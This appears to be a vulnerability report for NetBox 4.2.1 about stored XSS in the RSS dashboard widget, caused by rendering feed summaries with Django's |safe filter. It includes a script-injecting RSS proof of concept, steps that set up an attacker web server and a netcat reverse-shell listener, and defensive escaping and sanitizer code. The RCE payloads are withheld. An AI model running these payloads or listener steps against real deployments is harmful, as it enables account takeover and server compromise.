Description
Deployment Type
Self-hosted
Triage priority
I'm a NetBox Labs customer
NetBox Version
4.2.1
Python Version
3.12
Steps to Reproduce
I've sent a full list of vulnerabilities I've located to [email protected]. The report was sent late last year. I've upgraded to the latest version v4.2.1 and I've confirmed each vulnerability. A malicious RSS feed could potentially create a SuperUser or get a reverse shell via remote code execution. For that to be the case an administrator would need to have the malicious RSS feed on their dashboard or have the ability to add RSS widgets, create users/superusers, and/or upload scripts.

/netbox-4.2.1/netbox/templates/extras/dashboard/widgets/rssfeed.html

    {% for entry in feed.entries %}
    <div class="list-group-item px-1 py-2">
    <a href="{{ entry.link }}" class="text-body">{{ entry.title }}</a>
    <div class="text-secondary">
    {{ entry.summary|safe }}
    </div>
    </div>

- Craft an XML file with the RSS Feed Proof of Concept code.
- Start a python3 web server on the attacker server in the directory hosting the XML file:
    python3 -m http.server 80
- Navigate to the NetBox dashboard and add an RSS widget.
- Edit the RSS widget to point to the attacker controlled IP address and save.
- Refresh the Dashboard.
RSS Feed Proof of Concept
A general proof of concept is provided below. The SessionID cookie is protected by the httponly flag. The alternative scripts allow the attacker to perform remote code execution for shell access on the NetBox server and create a new superuser, but I don't believe I should post them here.
<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
<channel>
<title>Sample RSS Feed</title>
<link>https://www.example.com</link>
<description>Example RSS feed with a summary</description>
<language>en-us</language>
<pubDate>Sat, 23 Nov 2024 00:00:00 GMT</pubDate>
<item>
<title> Blog Post</title>
<link>https://www.example.com/first-blog-post</link>
<guid>https://www.example.com/first-blog-post</guid>
<pubDate>Sat, 23 Nov 2024 12:00:00 GMT</pubDate>
<summary><script>alert(document.cookie)</script>This is a brief summary of the blog post.</summary>
</item>
</channel>
</rss>
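The root cause shown in the template excerpt is that `entry.summary` is rendered through Django's `|safe` filter, so whatever markup the feed carries is handed to the administrator's browser unescaped. The following Python is an added defensive illustration, not NetBox project code and not the project's fix: it pulls the raw `<summary>` markup out of a constructed feed that mirrors the proof of concept above (plus a second item with an event-handler attribute and a `javascript:` link), and contrasts the verbatim rendering with two safer paths, plain escaping (what dropping `|safe` gives you) and an allow-list sanitizer that keeps harmless formatting. All function, class and constant names here (`summary_markups`, `sanitize`, `render_escaped`, `render_sanitized`, `AllowlistSanitizer`, `SAMPLE_FEED`) are illustrative assumptions.

```python
# Added example, not NetBox project code. Names are illustrative.
import html
import xml.etree.ElementTree as ET
from html.parser import HTMLParser

# Constructed sample feed: item 1 mirrors the report's proof of concept,
# item 2 adds an event handler and a javascript: link for coverage.
SAMPLE_FEED = """<rss version="2.0"><channel>
<title>Sample RSS Feed</title>
<item>
<title>Blog Post</title>
<link>https://www.example.com/first-blog-post</link>
<summary><script>alert(document.cookie)</script>This is a brief summary of the blog post.</summary>
</item>
<item>
<title>Second Post</title>
<link>https://www.example.com/second-post</link>
<summary><a href="javascript:alert(1)">click</a> <img src="x" onerror="alert(1)"/> <b>bold</b> &amp; plain</summary>
</item>
</channel></rss>"""

ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "br", "a", "ul", "ol", "li"}
ALLOWED_ATTRS = {"a": {"href"}}
VOID_TAGS = {"br"}


class AllowlistSanitizer(HTMLParser):
    """Keep a small set of formatting tags, drop everything else.
    <script>/<style> bodies, on*= attributes and non-http(s) hrefs never
    reach the output; all text is escaped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0  # > 0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return  # tag dropped; its text still flows through handle_data
        safe_attrs = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops onerror=, onclick=, style=, src=, ...
            if name == "href" and not value.strip().lower().startswith(("http://", "https://")):
                continue  # drops javascript:, data:, vbscript: ...
            safe_attrs.append(f' {name}="{html.escape(value, quote=True)}"')
        if tag == "a" and safe_attrs:
            safe_attrs.append(' rel="noopener noreferrer"')
        self.out.append(f"<{tag}{''.join(safe_attrs)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))

    def result(self):
        return "".join(self.out)


def sanitize(markup):
    parser = AllowlistSanitizer()
    parser.feed(markup)
    parser.close()
    return parser.result()


def summary_markups(feed_xml):
    """Raw inner markup of each item's <summary>, i.e. what a feed parser
    hands to the template and what |safe would emit verbatim."""
    out = []
    for item in ET.fromstring(feed_xml).iter("item"):
        summary = item.find("summary")
        parts = [summary.text or ""]
        for child in summary:  # ET.tostring includes each child's tail text
            parts.append(ET.tostring(child, encoding="unicode"))
        out.append("".join(parts))
    return out


def render_escaped(markup):
    """Simplest fix: Django's default autoescaping (drop the |safe filter)."""
    return f'<div class="text-secondary">{html.escape(markup)}</div>'


def render_sanitized(markup):
    """Allow-list sanitizing keeps the legitimate formatting feeds use."""
    return f'<div class="text-secondary">{sanitize(markup)}</div>'


if __name__ == "__main__":
    for markup in summary_markups(SAMPLE_FEED):
        print("verbatim (|safe):", markup)
        print("escaped:         ", render_escaped(markup))
        print("sanitized:       ", render_sanitized(markup))
```

Plain escaping is the smallest change and is what Django does once `|safe` is removed, but it turns every feed's formatting into visible angle brackets; the allow-list sanitizer above is the shape of the compromise widgets usually need. It is a teaching-sized parser, so for production code a maintained HTML sanitizer such as nh3 or bleach is the better choice.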
Reproduce the Attack
- Copy the Proof of Concept - RSS Remote Code Execution code to an XML file. (not posting it here)
- Edit the server_ip in the XML file to the attacker controlled IP address.
- Start a python3 web server in the directory hosting the XML file:
    python3 -m http.server 80
- Start a netcat listener:
    nc -nlvp 9006
- Navigate to the NetBox dashboard and add an RSS widget.
- Edit the RSS widget to point to the attacker controlled IP address and save.
- Refresh the Dashboard. After a few seconds the file should be pulled from the attacker server and uploaded to the NetBox server. The shell connection should come back to the attacker controlled netcat listener.
Expected Behavior
I do not expect that an external rss feed I've connected to my netbox labs source could create a superuser or get a reverse shell on my netbox server.
Observed Behavior
Remote Code Execution -> Reverse Shell
SuperUser was created